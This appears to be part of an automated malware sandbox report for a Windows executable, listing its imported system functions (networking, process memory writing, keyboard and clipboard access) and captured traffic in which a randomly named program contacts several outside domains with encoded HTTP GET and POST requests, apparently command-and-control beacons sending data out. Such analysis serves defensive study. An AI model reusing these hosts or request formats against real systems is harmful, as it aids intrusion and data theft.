                                                      RT_MANIFEST0x1322400x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                      DLLImport
                                                      WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                      WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                      USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                      USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                      GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                      SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                      OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 10, 2025 19:17:56.427198887 CET5429653192.168.2.7162.159.36.2
                                                      Jan 10, 2025 19:17:56.431986094 CET5354296162.159.36.2192.168.2.7
                                                      Jan 10, 2025 19:17:56.432065010 CET5429653192.168.2.7162.159.36.2
                                                      Jan 10, 2025 19:17:56.436966896 CET5354296162.159.36.2192.168.2.7
                                                      Jan 10, 2025 19:17:56.948143959 CET5429653192.168.2.7162.159.36.2
                                                      Jan 10, 2025 19:17:56.953170061 CET5354296162.159.36.2192.168.2.7
                                                      Jan 10, 2025 19:17:56.953238964 CET5429653192.168.2.7162.159.36.2
                                                      Jan 10, 2025 19:18:03.076930046 CET5431780192.168.2.723.167.152.41
                                                      Jan 10, 2025 19:18:03.081818104 CET805431723.167.152.41192.168.2.7
                                                      Jan 10, 2025 19:18:03.082073927 CET5431780192.168.2.723.167.152.41
                                                      Jan 10, 2025 19:18:03.092688084 CET5431780192.168.2.723.167.152.41
                                                      Jan 10, 2025 19:18:03.097522020 CET805431723.167.152.41192.168.2.7
                                                      Jan 10, 2025 19:18:03.462927103 CET805431723.167.152.41192.168.2.7
                                                      Jan 10, 2025 19:18:03.463129997 CET5431780192.168.2.723.167.152.41
                                                      Jan 10, 2025 19:18:03.464689016 CET5431780192.168.2.723.167.152.41
                                                      Jan 10, 2025 19:18:03.469490051 CET805431723.167.152.41192.168.2.7
                                                      Jan 10, 2025 19:18:18.516061068 CET5431880192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:18.520910978 CET805431813.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:18.521034956 CET5431880192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:18.538081884 CET5431880192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:18.542946100 CET805431813.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:18.996052027 CET805431813.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:18.996301889 CET805431813.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:18.996531010 CET5431880192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:20.044959068 CET5431880192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:21.065268040 CET5431980192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:21.070513010 CET805431913.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:21.070677042 CET5431980192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:21.091377974 CET5431980192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:21.096347094 CET805431913.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:21.545516014 CET805431913.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:21.545583010 CET805431913.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:21.545643091 CET5431980192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:22.607306957 CET5431980192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:23.626198053 CET5432080192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:23.631321907 CET805432013.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:23.631448984 CET5432080192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:23.647077084 CET5432080192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:23.652034044 CET805432013.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:23.652100086 CET805432013.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:24.112307072 CET805432013.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:24.112499952 CET805432013.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:24.112565041 CET5432080192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:25.163961887 CET5432080192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:26.184861898 CET5432180192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:26.189858913 CET805432113.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:26.189944983 CET5432180192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:26.200822115 CET5432180192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:26.205796957 CET805432113.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:32.736599922 CET805432113.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:32.737611055 CET805432113.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:32.737726927 CET5432180192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:32.739840984 CET5432180192.168.2.713.248.169.48
                                                      Jan 10, 2025 19:18:32.744748116 CET805432113.248.169.48192.168.2.7
                                                      Jan 10, 2025 19:18:54.486821890 CET5432280192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:54.491744995 CET8054322154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:54.492547035 CET5432280192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:54.672643900 CET5432280192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:54.677525043 CET8054322154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:55.453870058 CET8054322154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:55.453955889 CET8054322154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:55.454202890 CET5432280192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:56.185731888 CET5432280192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:57.269099951 CET5432380192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:57.274147034 CET8054323154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:57.274713993 CET5432380192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:57.325619936 CET5432380192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:57.330563068 CET8054323154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:58.187635899 CET8054323154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:58.187823057 CET8054323154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:58.187887907 CET5432380192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:58.842156887 CET5432380192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:59.861999989 CET5432480192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:59.867014885 CET8054324154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:59.867141962 CET5432480192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:59.882857084 CET5432480192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:18:59.887763977 CET8054324154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:18:59.887805939 CET8054324154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:00.777610064 CET8054324154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:00.777726889 CET8054324154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:00.777959108 CET5432480192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:01.388748884 CET5432480192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:02.408250093 CET5432580192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:02.413301945 CET8054325154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:02.413388968 CET5432580192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:02.425019979 CET5432580192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:02.429882050 CET8054325154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:03.329010010 CET8054325154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:03.329050064 CET8054325154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:03.329293013 CET5432580192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:03.334347963 CET5432580192.168.2.7154.23.178.231
                                                      Jan 10, 2025 19:19:03.339220047 CET8054325154.23.178.231192.168.2.7
                                                      Jan 10, 2025 19:19:08.378966093 CET5432680192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:08.383810043 CET8054326130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:08.383899927 CET5432680192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:08.400428057 CET5432680192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:08.405261993 CET8054326130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:08.999353886 CET8054326130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:08.999401093 CET8054326130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:08.999484062 CET5432680192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:09.904531002 CET5432680192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:10.923557043 CET5432780192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:10.928427935 CET8054327130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:10.928514957 CET5432780192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:10.946492910 CET5432780192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:10.951344013 CET8054327130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:11.566744089 CET8054327130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:11.566871881 CET8054327130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:11.571387053 CET5432780192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:12.451225042 CET5432780192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:13.470357895 CET5432880192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:13.475148916 CET8054328130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:13.475478888 CET5432880192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:13.491508007 CET5432880192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:13.496356010 CET8054328130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:13.496449947 CET8054328130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:14.114927053 CET8054328130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:14.115207911 CET8054328130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:14.115319014 CET5432880192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:14.998153925 CET5432880192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.018089056 CET5432980192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.022927046 CET8054329130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:16.023091078 CET5432980192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.038676977 CET5432980192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.044166088 CET8054329130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:16.649893045 CET8054329130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:16.650060892 CET8054329130.185.109.77192.168.2.7
                                                      Jan 10, 2025 19:19:16.650135994 CET5432980192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.653340101 CET5432980192.168.2.7130.185.109.77
                                                      Jan 10, 2025 19:19:16.658282042 CET8054329130.185.109.77192.168.2.7
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 10, 2025 19:17:56.426547050 CET5359714162.159.36.2192.168.2.7
                                                      Jan 10, 2025 19:17:57.371016026 CET53513131.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:18:02.368851900 CET5990153192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:18:03.070314884 CET53599011.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:18:18.502438068 CET5189053192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:18:18.513511896 CET53518901.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:18:37.755351067 CET4954153192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:18:37.769030094 CET53495411.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:18:46.048491001 CET5485353192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:18:46.057908058 CET53548531.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:18:54.149763107 CET5080453192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:18:54.288964033 CET53508041.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:19:08.345901012 CET6324453192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:19:08.376514912 CET53632441.1.1.1192.168.2.7
                                                      Jan 10, 2025 19:19:22.367851973 CET5532253192.168.2.71.1.1.1
                                                      Jan 10, 2025 19:19:22.380876064 CET53553221.1.1.1192.168.2.7
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 10, 2025 19:18:02.368851900 CET192.168.2.71.1.1.10x8973Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:18.502438068 CET192.168.2.71.1.1.10x62f5Standard query (0)www.bcg.servicesA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:37.755351067 CET192.168.2.71.1.1.10x848Standard query (0)www.egldfi.xyzA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:46.048491001 CET192.168.2.71.1.1.10x3360Standard query (0)www.betmatchx.onlineA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:54.149763107 CET192.168.2.71.1.1.10xd4adStandard query (0)www.43kdd.topA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:19:08.345901012 CET192.168.2.71.1.1.10xb060Standard query (0)www.lgdiamonds.infoA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:19:22.367851973 CET192.168.2.71.1.1.10x2259Standard query (0)www.jalan2.onlineA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 10, 2025 19:18:03.070314884 CET1.1.1.1192.168.2.70x8973No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 19:18:03.070314884 CET1.1.1.1192.168.2.70x8973No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 19:18:03.070314884 CET1.1.1.1192.168.2.70x8973No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:18.513511896 CET1.1.1.1192.168.2.70x62f5No error (0)www.bcg.services13.248.169.48A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:18.513511896 CET1.1.1.1192.168.2.70x62f5No error (0)www.bcg.services76.223.54.146A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:37.769030094 CET1.1.1.1192.168.2.70x848Name error (3)www.egldfi.xyznonenoneA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:46.057908058 CET1.1.1.1192.168.2.70x3360Name error (3)www.betmatchx.onlinenonenoneA (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:18:54.288964033 CET1.1.1.1192.168.2.70xd4adNo error (0)www.43kdd.top43kdd.topCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 19:18:54.288964033 CET1.1.1.1192.168.2.70xd4adNo error (0)43kdd.top154.23.178.231A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:19:08.376514912 CET1.1.1.1192.168.2.70xb060No error (0)www.lgdiamonds.info130.185.109.77A (IP address)IN (0x0001)false
                                                      Jan 10, 2025 19:19:22.380876064 CET1.1.1.1192.168.2.70x2259No error (0)www.jalan2.onlinejalan2.onlineCNAME (Canonical name)IN (0x0001)false
                                                      Jan 10, 2025 19:19:22.380876064 CET1.1.1.1192.168.2.70x2259No error (0)jalan2.online108.181.189.7A (IP address)IN (0x0001)false
                                                      • www.75178.club
                                                      • www.bcg.services
                                                      • www.43kdd.top
                                                      • www.lgdiamonds.info
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.75431723.167.152.41806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:03.092688084 CET483OUTGET /vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.75178.club
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.75431813.248.169.48806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:18:18.538081884 CET749OUTPOST /5onp/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 219
                                                      Host: www.bcg.services
                                                      Origin: http://www.bcg.services
                                                      Referer: http://www.bcg.services/5onp/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 56 53 46 67 77 6d 74 6e 46 6f 38 59 62 6a 65 49 4f 4d 75 31 77 6e 63 4a 34 52 35 49 2f 78 58 72 6d 79 44 44 38 54 41 2b 6a 65 57 76 38 68 56 50 68 33 76 48 45 64 2b 58 76 51 74 43 38 44 50 4c 6a 47 72 53 51 62 4c 33 54 4f 57 58 4a 34 39 6f 78 52 6b 54 64 53 48 2f 71 76 62 4f 68 73 7a 47 69 37 44 2f 62 42 54 68 79 6b 79 52 6c 6c 6d 62 37 76 78 61 44 55 72 70 74 68 65 4f 57 66 36 4d 52 58 39 7a 74 51 70 50 6f 41 69 36 53 7a 57 48 61 67 62 41 7a 6d 57 6f 6b 6c 6d 53 38 77 79 33 31 4e 51 48 4d 78 4a 2b 66 49 44 34 43 72 6d 51 44 6a 4f 51 70 75 79 4a 4d 59 34 34 6e 52 32 79 4a 55 55 38 46 68 50 72 55 4a 5a 75 38 6e 69 6a 33 67 3d 3d
